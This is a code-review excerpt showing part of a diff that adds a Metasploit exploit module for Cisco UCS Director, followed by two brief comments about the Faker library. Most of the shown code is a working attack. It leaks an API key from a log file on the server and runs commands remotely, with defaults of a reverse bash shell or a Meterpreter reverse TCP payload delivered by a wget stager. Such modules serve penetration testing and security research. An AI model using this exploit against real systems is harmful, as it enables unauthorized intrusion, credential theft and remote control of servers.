modules/exploits/linux/http/cisco_ucs_cloupia_script_rce.rb

```diff
@@ -0,0 +1,307 @@
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            'Platform' => 'unix',
+            'Arch' => ARCH_CMD,
+            'Type' => :unix_command,
+            'DefaultOptions' => {
+              'PAYLOAD' => 'cmd/unix/reverse_bash'
+            }
+          ],
+          [
+            'Linux Dropper',
+            'Platform' => 'linux',
+            'Arch' => [ARCH_X86, ARCH_X64],
+            'Type' => :linux_dropper,
+            'DefaultOptions' => {
+              'CMDSTAGER::FLAVOR' => 'wget',
+              'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
+            }
+          ]
+        ],
+        'DefaultTarget' => 1,
+        'DefaultOptions' => {
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(443),
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('API_KEY', [false, 'API key if you have it']),
+      OptString.new(
+        'LEAK_FILE',
+        [
+          true,
+          'Leak API key from this file (absolute path)',
+          '/opt/infra/idaccessmgr/logfile.txt'
+        ]
+      )
+    ])
+
+    # XXX: https://github.com/rapid7/metasploit-framework/issues/12963
+    import_target_defaults
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/app/ui/login.jsp')
+    )
+
+    unless res
+      return CheckCode::Unknown('Target did not respond to check request.')
+    end
+
+    unless res.code == 200 && res.body.include?('Cisco UCS Director')
+      return CheckCode::Unknown('Target is not running Cisco UCS Director.')
+    end
+
+    CheckCode::Detected('Target is running Cisco UCS Director.')
+  end
+
+  def exploit
+    unless datastore['LEAK_FILE'].start_with?('/')
+      fail_with(Failure::BadConfig, 'LEAK_FILE is not an absolute path')
+    end
+
+    # NOTE: Automatic check is implemented by the AutoCheck mixin
+    super
+
+    # Randomly named file is never written to the exports directory
+    create_exports_dir(
+      '/opt/infra/web_cloudmgr/apache-tomcat/webapps/app/cloudmgr/exports',
+      rand_text_alphanumeric(8..42)
+    )
+
+    if (@api_key = datastore['API_KEY'])
+      print_status("User-specified API key: #{@api_key}")
+    else
+      leak_api_key(datastore['LEAK_FILE'])
+    end
+
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+    case target['Type']
+    when :unix_command
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+  end
+
+  def create_exports_dir(*path_parts)
+    path = normalize_uri(path_parts)
+
+    mime = Rex::MIME::Message.new
+    mime.add_part(
+      Faker::Hacker.say_something_smart, # data
```

Comment:
Never seen this before, I love it

Reply:
I've been enjoying [Faker](https://github.com/faker-ruby/faker) for random strings.